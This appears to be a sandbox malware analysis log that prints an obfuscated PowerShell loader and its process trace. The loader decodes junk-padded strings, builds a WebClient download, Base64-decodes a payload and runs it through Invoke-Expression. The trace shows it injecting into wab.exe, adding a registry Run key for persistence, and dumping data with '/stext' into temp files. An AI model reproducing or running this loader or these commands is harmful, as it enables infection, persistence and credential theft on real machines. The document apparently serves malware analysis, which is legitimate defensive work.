HysteraDiabetedKammendiJefest.bVetiveraThrowworStaalvroPlacenthInnuendiGlitr tl Paral.aFortonel Glairea,mmutabt,ontradwNonprodoHunde l. 
Futurod tudercu Mudredcover,igkDe.angsd Macrocnpho.osks verflu.Tbrudsso To.seirRadiovigBrasero/VolitioaVrvlehilAllainelTotalsy/PhrynidTEtymo oo Roque.i,nterkolFilialseAfviklit UdaandpJentjenaHjertevpChackeri DividerEskadre.AntisufdNonst meCater.npbackbitlFreestooUnpoisey,urstpa ';$Smedningens=Mikado 'Unbutto> Indici ';$Sprinklervsken=Mikado 'KontokbiVolumeteHemihe.x Slingr ';$Cagot='Dockizations60';$Tilskring = Mikado ' K,stnieJan.lerc Bra.dahHande.so Chapta Expansi%Vir uela Elatc p RoughcpPanegy,dsellehyaD.imonitinitialaAchroni%Novelet\ osenstCinhivemo DissennK nnikktParfumergraver,iLsegldeb Cod.scu Starquthamrendo Gas etr Rve agsOlibanu.EpichilPHopeiteaUudslukpscuttl. Th,race&Brysth,&Outrefo El borae ProgracBrnesprhHulsle o Witlos plackletAmphirh ';Xylyl (Mikado 'Endolys$CimbrisgWispliklVirkeliopolitikbD,trugcaBgede elKotylef: Dext,if Bl.stoiKroatisrSnow owe ,ignalbParenthoH,idlgeoSenioretDishono=.vyunde(Se nmshc JunglemStarrind Flush. Snuptag/Unenwovc.cicula Supergr$EnsformTR sideniSedlersl Essayes TrammikBotulinrEphebeuiAr.ejdsn DerivegScrimwi)Subclam ');Xylyl (Mikado 'Hyper,c$ Erotisg .rikkelSubd.ntoMesa.icb Blokada Sy,axalIrascib:Bug,hypDBice,tri BagtrasJenmakekMicr tyoTransakgOp,oegerFakticia Jeaporf KroniniViljenssFru.tlekSjattefelegemulsj.gtpro=Jellstu$PamphleSForsinkpChalleni MegalenToralhaiGennembtHumo riuSubd,vibUneffigeSk,ltonr.gsvinbc IlioisuAr,enohlMass oraGent getAcalycae F lset. 
VenstrsAlmenvepBor,deslEls,liniTopske.t.layful(Thermof$Ud.andsS Car.urmGalvanoeShillald P ogrenMateriaiDurriesnA.arerngEjendomeProtoclnStueflus reatta)Indisti ');$Spinituberculate=$Diskografiskes[0];$Illegitimated= (Mikado ' Immite$o ercrigEngramblDraughtoWharfsibShippi aRauwolflSh mpoo:Li.ehooE UnsecllTourellePenitencAtionertAntimonropflgnioTruebludIndavlei Tav.rna InterilInklu,eyOmvekslzSedimene DebatsrTi skri=ReekspoNNedmejneS ltierw Rustvo-Alchem O ntioxibFlja,tejEnchanteSchizo c Pourbot E curs su,keneSNon,oveyMicawbesSaturnitHormonoeOverprim undive.TrsklerNmateriaeNringentTythesr.T,pefliWNyreligeM,nkesmbDeaminaCNaringil stubblirhagioneCheilodnBrugermt');$Illegitimated+=$fireboot[1];Xylyl ($Illegitimated);Xylyl (Mikado 'Englify$Dift,ngE Orni hlVilkaareTr,nsmicSelvk,et aggadirUndtageoTraadkudGentiliiPortr,tapalliatlSor.kjoyTilstrbzEksercie Draftsrunnomin.AfsendeH Rapp leAeroplaaPrangerdPersoniePlanc.er Snitsls ,lektr[Journal$ lcladhFAeonicauFripladlladdersdi,nisatbIntemper,vershoabum,sybgNglepert Subro,eOpisthosA,strin]Jaz,eta= ibrop$,lettebGUnde,feu Reph ti Ansv,rl PassivtScabbiesAnsgnin ');$Akrobat=Mikado ' skamfe$SmadrenESvmmendlForslageDevastecStnkpudtRhamnusr Isobu,odiagonadPeduncliUnstrenaFilatellUnwithdyIxodidszMgtediseNonaccrr.atapho.SystemaD sdvaneoKittieswVerse tnBrs frolHjesteroKorr,spaFjervgtdAf.temnFRastestiArkfde,lCr,dworeMithrai(Supiner$BestignSVristrep omdoebiPro,ptenBlindg,i PapirbtRetouc u,unkersbFejlbehe ayerdorSprogvicOverlreu fontinlGoyetiaaUnmedictReedlikeanattaf,Billard$SkeetbrN FurrileRecursidCydippegSeid mrrSapropeaNoege,hvAtt.akt)Marmo p ';$Nedgrav=$fireboot[0];Xylyl (Mikado 'Udso gt$Fly tengUn,nhablT,talssoBaarebub ScowedaSemikollDa idsf:Omf,rmaLC.orouseProgra.jKajakkeeKarbidlvAutoex rBevidstd PizziciStrong e Mis ikrB,ddestnu derhoeSnashessQual.ag1Malerin2Antithe9Incompr= Onc ov(coron.tTRyghvireFolkekusskubor,tHesitat-InformaPmismateaeksistetReequiphOfayscr Landsk$Trff.lsNFlyvereeAdo neddCellefogPsychoprKuglefoaKirurgevAs,hete)Misplan 
');while (!$Lejevrdiernes129) {Xylyl (Mikado 'Sande,e$Basitemg Af,nnelStoushcoCivildobVerdensaDemilitlStartko:CongregtLark.omrdaisyssy ppositk aftrripEpisiorlH rmitia SekunddDizequ,eAf entnrTyvebetsMancipa=unstout$Afprikkt SupranrSamsvaruk,ittede Ejeste ') ;Xylyl $Akrobat;Xylyl (Mikado 'JdesmicSCe ebrotScrollea,inemasrLaughert aparth-Cardi pSKastanil Skak pe.atamane CostaepMrkbar Prostat4 fistul ');Xylyl (Mikado 'Bevogtn$ untasegBarse,vlTurdansoDosmersbBlegnetaLandingl Assent:Oste.naLHarrowmeSamucanjSmithieeO strukvPerfectr Indruld EchinoiOttili eHysterirU,seignnSyleconeUnexpersTys hed1 Co ege2Stangsp9Rastpla=Kryptis(Engra nTRenskreeSuperins CirkattPriserk-UtaalelP systema DoitsptHenvejrh .omspr Intervi$undespoNPerisyse BambusdNabogitgDebindsrKulturfaHidrrtev Pepton)fdninge ') ;Xylyl (Mikado 'beskfti$smre rag Igua.olap roaco H vnebbSanseapaSfartsblUndisag:Intour.HLsbarhejLitteraoEpi,hylr ThumbptEfterree S,prantFruitwoaSemi,bskFrem.rek LyskureSn bsninOvercom=Bl mmes$ SkaldygB.adgullOverwaro elelitbSkyllevaMisprovl Flydev:Imp rraU DejlignMesomordSpagheteSonogr,rIdeeltscViljeslrkammerje TilskasUdtrykstUerstat1Dackeri6Diedric0 Landst+Engleli+ Eart.m% A,etyl$pupilsbDTjenesti BalkarsGipsd.pk .rikkeoBac risgGopurakrResoluta .rydsff SukkeriSlutfass .lycopkSkibskie NoncussSnkning.KedushacbyudvikoPentecouSanguifn agpiedtSelvris ') ;$Spinituberculate=$Diskografiskes[$Hjortetakken];}$Forlngelseslovs=308238;$udenlandsdanskerne=30330;Xylyl (Mikado 'Nidoros$Er oldeg MilliblLiberalo Ch omebMetzgonaUndervalSimulat:SintredLToppunkvBronzeveparadism CollecaJan.erkn KidnapkWarehoueOveracurRntgenfnFarvetaeMercato Begrudg=Galagal Eje ahoGScalenoeGeneraltSubprep-MusedesC Lsr,fooLimen,enD.scocat,emisapecoronitnJagten.tI.terfi Multiv$Syrer iNAchesove Fo,srgd BaccalgThromborlienteraSagprosvfarvepr ');Xylyl (Mikado 'Syp.ere$Pros,avgAftvinglcibariooUformaabfremelsaBet linlR,stjer: Lrre,sUEsk,ldsn AnskuebPreplacrT,ssesuoSpildola Ra,pedc Mi,ieuha.simileKana iedKommise Blodser=Unhypot 
Kilomol[.epleteS Pentagy Bobes.sStegenetValvulae talblomInterre.aneurinC Lrest,oUbefjednPlastikvLskedr.e oolierrSolmodntHaglgev] Hypos :,rocivi: Sk,mplF etrolar.dringsogracioum JumperBAfterdaaGadel usIndenrieprogram6icteric4 VinderS Granult Sulphar IncaseiLondonen Nonparg Hovedr(persona$BautastLTaxaudlvTranspieSleth gmW.ltonbaMo phinnSanseorkAgariciejazzmusr MatsornBeregnieDiethyl)Skibspr ');Xylyl (Mikado 'Nove,in$StoachsgRevokselSystemeoGra.ciabIsomer.aEnfoldil gifted:Overh nUManicurrAgentureTempyogdUnrollme,ksekvetZin,ify edisma=Glycero Mollusc[UrgoniaSSin ulayNoncancsForetyptOverproeOveri.ym Kryd h.TelotreT R bstieEkviperx Sprogft L poli.bevilliEMatchsanBevislicSystempoBe onardForskriiM,lticonHalshvigTacheom]Acervat: ster,l:SolospiASpinketSM toposCbuskrseI,etoolsIBestykn.LavatoeG egisteedisapprtUds,yknS NondiftBo.tlbnrDa regniPhenospn rdigmogStikfor(Stuearr$TilhyllULegaliznliannatbNonsimurSpaanplo TophueaStanke,c Xip.ochmakro aeSmovsetd,ecolor)Hng,nde ');Xylyl (Mikado 'Klatvas$ryg,adeg StaveslYeom,nloAutomobbBestia a un.labl Telefo: ummertBTroloveeFakticir .esvrlibudg tslKassebgdUdgiftssElektro=Mistill$ Zamar,UOutbo,ir PestereGau.sfid Knarkee evaport T resn.ElixatisNoninteu OphidsbCuticulsN,ncommtinvent rSp.rrowiPsykotene,evatogRitu,li( Penepl$ ci iusFF,nansloHydrolorBrndk mlMelolonnTrst,trg.kftedeeSankthalDia,kopsS,beslaeF ockres enckesl MaadenoSwazilnvAngelihsSalgsch,Lutoses$NattelyuAs icsmdco,certeComputenSlvtjsslPostulaanontra.nHj.rnevdEncolors AnguludR,eoptaa mmersenParrings afspilkErkendeeSinopiarKorr,mpnGulfedpeTonomet)grund t ');Xylyl $Berilds;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Contributors.Pap && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slidfladerne" /t REG_EXPAND_SZ /d "%Skovbyggelinjernes% -w 1 $Slutvrdier=(Get-ItemProperty -Path 'HKCU:\Rewets\').Cavilingness;%Skovbyggelinjernes% ($Slutvrdier)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gfqj"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qhvctgdb"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qhvctgdb"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tbjutynvjjb"

Network


Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyqtrd1p.0hl.ps1


C:\Users\Admin\AppData\Roaming\Contributors.Pap


C:\Users\Admin\AppData\Local\Temp\gfqj
